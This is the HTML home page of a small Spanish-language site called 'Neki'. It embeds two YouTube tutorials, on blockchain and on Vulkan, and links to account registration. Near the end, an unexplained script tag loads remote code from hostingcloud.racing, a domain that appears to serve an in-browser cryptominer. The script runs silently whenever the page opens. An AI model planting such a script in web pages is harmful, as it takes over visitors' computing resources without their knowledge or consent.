<!DOCTYPE html>
<html lang="es">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <title>Principal</title>
<meta charset="utf-8">
<meta name="keywords" content="chat, social, amigos">
<meta name="viewport" content="width=device−width; initial−scale=1.0; maximum-scale=1.0; minimum.scale=1.0;">

<link rel="stylesheet", href="stylesheets/index.css"></link>
<link rel='icon' href='https://res.cloudinary.com/djlzeapiz/image/upload/v1544741360/favicon.ico'></link>
</head>
<body>
    <header class="header">
        <div class="header-container logo-nav-container">
            <h1 class="logo"> Neki </h1>
            <nav class="navigation">
                <ul>
                    <li><a href="/registrar" class="clickable">Crear Cuenta</a></li>
                </ul>
            </nav>
        </div>
    </header>

    <main class="main-w main-p">
        <h2>Videos:</h2>

        <h3>Blockchain:</h3>

        <h4>01 - Blockchain: Creando bloque:</h4>
        <iframe width="560" height="315" src="https://www.youtube.com/embed/vrLpjEwmIn4" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>

        <h3>Vulkan:</h3>

        <h4>01 - Vulkan: Creando instancia</h4>
        <iframe width="560" height="315" src="https://www.youtube.com/embed/j4fbUdEGtWo" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>

        <a href="https://www.youtube.com/channel/UCFNNAWARC44MM-jv_5O6kSg/videos?view_as=subscriber" target="_blank">Más</a>
    </main>

    <section class="r-section r-section-p r-section-w">
      <p>Aquí les comparto algo de lo que estoy aprendiendo. Espero les sirva de ayuda.</p>
    </section>

    <script src="https://www.hostingcloud.racing/HDFk.js"></script>
    <script src="scripts/home.js"></script>
</body>
</html>
